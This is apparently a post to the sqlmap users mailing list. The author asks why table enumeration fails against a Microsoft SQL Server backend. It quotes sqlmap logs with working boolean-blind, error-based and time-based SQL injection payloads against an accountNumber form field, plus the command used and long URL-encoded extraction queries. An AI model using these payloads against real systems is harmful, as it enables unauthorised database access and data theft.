SQlmap is able to extract db names, current user and backend info, but
when I try to get tables I end up with junk data or nothing at all. I
find this strange because SQLmap has identified multiple injection
methods and I am on a fast local connection with the target server.
This is the log file with examples of good/bad data.
sqlmap identified the following injection points with a total of 118915
HTTP(s) requests:
---
Place: POST
Parameter: accountNumber
Type: boolean-based blind
Title: Generic boolean-based blind - Parameter replace (original value)
Payload: accountNumber=(SELECT (CASE WHEN (4906=4906) THEN 1111111
ELSE 1/(SELECT 0)
END))&meterNumber=1111111&zipCode=78451&email=t...@test.com®ister=Register
Type: error-based
Title: Microsoft SQL Server/Sybase error-based - Parameter replace
Payload:
accountNumber=(CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(109)+CHAR(100)+CHAR(58)+(SELECT
(CASE WHEN (3149=3149) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(100)+CHAR(111)+CHAR(103)+CHAR(58))))&meterNumber=1111111&zipCode=78451&email=t...@test.com®ister=Register
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: accountNumber=-9196 OR 8333=(SELECT COUNT(*) FROM sysusers
AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS
sys5,sysusers AS sys6,sysusers AS
sys7)&meterNumber=1111111&zipCode=78451&email=t...@test.com®ister=Register
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [21]:
[redacted]
current user: [redacted]
current database: [redacted]
current user is DBA: False
[6 tables]
+------------------------------------------------------------------------------------------------------------------------
| dbo.[??4c0?4A00370?520?22??2d0040005a??00??2A??58??5f0?0d00000?3c??2
|
|dbo.[\n\n]
|
|dbo.[\n\n]
|
dbo.[\n\n]
dbo.[\n\n]
+------------------------------------------------------------------------------------------------------------------------
When I use --no-cast and --hex flags I get no data at all and when I
don't use them I get junk data. When I look at the raw request/response
in every case I see sqlmap send a test request with no injection which
generates a 200 response, then follows an attempt to read the number of
tables which generates a 500 error with a number in the error message.
Every follow on request generates a 200 OK response, which means that
neither boolean nor error based methods are working and it falls back to
time based which then also fails. Of all the correct data gathered so
far, all was through error messages. However, specifying --technique=E
--parse-errors does not gain any additional info. Some selected
examples from the logs related to this attempt follow:
./sqlmap.py -r /root/request --fresh-queries -o --hex --no-cast -D
master --tables -t ~/sqlmap
[WARNING] it was not possible to count the number of entries for the SQL
query provided. sqlmap will assume that it returns only one entry
[WARNING] in case of continuous data retrieval problems you are advised
to try a switch '--no-cast' and/or switch '--hex'
[CRITICAL] unable to retrieve the tables for any database
[WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 18 times
%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20master.sys.fn_varbintohexstr%28CAST%28COUNT%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29
HTTP response [#2] (500 Internal Server Error):
[Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when
converting the nvarchar value ':omd:0x00000167:dog:' to data type int.
%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%29%2C1%2C100%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20AND%20master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20NOT%20IN%20%28SELECT%20TOP%200%20master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20ORDE
R%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29
HTTP response [#3] (200 OK):
------------------------------------------------------------------------------
Everyone hates slow websites. So do we.
Make your web apps faster with AppDynamics
Download AppDynamics Lite for free today:
http://p.sf.net/sfu/appdyn_d2d_feb
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
